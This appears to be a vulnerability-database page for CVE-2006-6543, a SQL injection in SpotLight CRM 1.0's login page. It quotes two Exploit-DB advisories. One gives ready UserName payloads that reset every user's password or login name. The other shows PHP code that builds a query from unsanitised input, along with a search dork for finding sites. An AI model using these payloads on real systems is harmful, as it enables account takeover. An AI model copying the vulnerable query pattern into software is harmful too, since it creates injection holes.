CVE-2006-6543
published 2006-12-14CVE-2006-6543: Multiple SQL injection vulnerabilities in login.asp in AppIntellect SpotLight CRM 1.0 allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.02%
59.1th percentile
Multiple SQL injection vulnerabilities in login.asp in AppIntellect SpotLight CRM 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) login (UserName) and possibly (2) password parameter. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| appintellect | spotlight_crm | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
exploitdb·2007-12-25
CVE-2007-6543 eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
---
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off
[-] Vulnerable code in /suggest-link.php :
30. /** gets information about current category **/
31. $category =& $gDirDb->getCategoryById($_GET['id']);
32. $gDirSmarty->assign_by_ref('category', $category);
[-] getCategoryById function defined in /classes/Dir.php :
323. function getCategoryById($aCategory)
325. {
326. $sql = "SELECT * FROM `{$this->mPrefix}categories` ";
327. $sql .= "WHERE `id` = '{$aCategory}'";
328.
329. return $this->mDb->getRow($sql);
330.
Exploit-DB
SpotLight CRM 1.0 - 'login.asp' SQL Injection
exploitdb·2006-12-09
CVE-2006-6543 SpotLight CRM 1.0 - 'login.asp' SQL Injection
SpotLight CRM 1.0 - 'login.asp' SQL Injection
---
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $2,499
[[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL]
Example:
-> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
No writeups or analysis indexed.
2006-12-14
Published